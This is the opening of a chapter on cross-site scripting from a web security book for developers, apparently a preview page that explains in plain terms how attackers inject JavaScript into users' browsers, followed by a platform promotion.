7CROSS-SITE SCRIPTING ATTACKS
In the previous chapter, you saw how attackers can inject code into web servers to compromise websites. If your web server is secure, a hacker’s next best injection target is the web browser. Browsers obediently execute any JavaScript code that appears in a web page, so if an attacker can find a way to inject malicious JavaScript into a user’s browser while the user views your website, that user is in for a bad time. We call this type of code injection a cross-site scripting (XSS) attack.
JavaScript can read or modify any part of a web page, so there’s a lot an attacker can do with cross-site scripting vulnerabilities. ...
Get Web Security for Developers now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
